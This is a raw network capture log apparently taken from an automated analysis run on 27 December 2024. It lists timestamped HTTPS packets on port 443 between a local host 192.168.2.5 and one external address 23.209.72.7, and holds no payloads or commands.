Dec 27, 2024 07:10:52.133181095 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.138778925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.138798952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.138811111 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.138914108 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139058113 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139087915 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139101028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139225006 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139236927 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139324903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.139542103 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.152772903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.152823925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.152836084 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.152921915 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.152934074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.152945042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.152956963 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.153131962 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.153147936 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.153158903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.153171062 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.156776905 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.166153908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.166208982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.166222095 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.166265965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.168812990 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.246164083 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.300858021 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.300879002 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.323014021 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.323072910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.323219061 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.323231936 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.323240995 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.323367119 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.326514959 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.327975035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328171968 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328228951 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328241110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328243971 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.328335047 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328347921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328452110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328464985 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328480005 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328583956 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328665018 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.328881025 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.341749907 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.369833946 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.420867920 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.426898956 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.433166981 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.433326006 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.433459997 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.433486938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.433495998 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.433496952 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.439618111 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.456466913 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462007046 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462218046 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462239027 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462388992 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462394953 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.462445021 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462455988 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462538958 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462583065 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462595940 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462606907 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462769032 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.462989092 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.476458073 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.476556063 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.479816914 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.480156898 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487185955 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487407923 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487457991 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487513065 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487525940 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487613916 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.487615108 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487653017 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487664938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487675905 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.487687111 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.494083881 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.500297070 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500439882 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500552893 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500586987 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500653982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500659943 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.500665903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500752926 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500765085 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.500775099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.541028023 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.652591944 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.665561914 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.665595055 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.665709972 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.665719032 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.667206049 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.680576086 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.686795950 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.763792992 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.769541025 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.769879103 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770059109 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.770241976 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770255089 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770267010 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770407915 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770420074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770431995 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770570993 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770582914 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770593882 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.770682096 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.784378052 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.784477949 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.803244114 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.810395002 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.810642004 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.810883045 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.810895920 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.810906887 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811069965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811081886 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811093092 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811239004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811250925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811261892 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811275005 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.811434031 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.817992926 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824548006 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824727058 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824903011 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824915886 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824925900 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824939013 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.824949980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.825081110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.825093031 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.825105906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.825439930 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.853971004 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:52.854612112 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.869863033 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.871376991 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.885164022 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.893150091 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:52.893609047 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.127263069 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.134012938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.134290934 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.134308100 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.134361982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.134372950 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.134383917 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.134944916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.135014057 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.135025978 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.135087967 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.135097980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.172699928 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.256844044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.276763916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.280738115 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.281852961 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.281897068 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.281985998 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.281996965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282007933 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282017946 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282068968 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282100916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282197952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282207966 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282218933 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282229900 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282241106 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.282316923 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.283119917 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.283560991 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.283770084 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.283822060 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.283834934 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.283854961 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.283992052 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.284002066 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.287476063 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.287904024 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.288007975 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.289762974 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.290229082 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.291081905 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.291129112 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.291305065 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.291727066 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.291929960 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.316245079 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.319077015 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.359884977 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.485268116 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.630557060 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.638739109 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.643692970 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.648561001 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.648931026 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.648967028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649091005 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649167061 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649179935 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649316072 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649327993 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649403095 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649454117 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649466991 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649616957 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649627924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649640083 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649651051 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649749994 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649760008 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.649912119 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.669327021 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.683247089 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.718527079 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.726317883 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.726411104 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.726547003 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.726558924 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.726568937 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:53.726629972 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.726780891 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.726843119 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:53.764256954 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.006762028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.028517962 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.028886080 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.028922081 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.028954983 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029114008 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029160976 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029256105 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029295921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029308081 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029511929 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029521942 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029534101 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029627085 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029639006 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029649019 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029660940 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029866934 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029877901 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029889107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.029901028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.030112028 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.044086933 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044157982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044169903 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044302940 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044303894 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.044320107 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044332981 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044346094 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044504881 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044516087 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.044527054 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064320087 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064353943 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064372063 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064501047 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064508915 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.064512968 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064553022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064563990 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064778090 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064788103 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.064799070 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069178104 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069226980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069360018 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069360018 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.069370985 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069406986 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069418907 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069542885 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069555044 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069566965 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.069674969 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.075100899 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087434053 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087534904 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087661982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087707043 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087764978 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087778091 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087841034 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087882042 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.087933064 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.087945938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.088062048 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.088073969 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.092536926 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.092549086 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.092607975 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.092979908 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.093071938 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.099405050 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099425077 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099493027 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099505901 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099630117 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099641085 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099653959 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099791050 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099802971 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.099818945 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.105648994 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:54.111709118 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.111798048 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.111810923 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.111865997 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.111879110 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.111888885 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.111901045 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.112065077 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.112092018 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:54.112104893 CET	443	58828	23.209.72.7	192.168.2.5
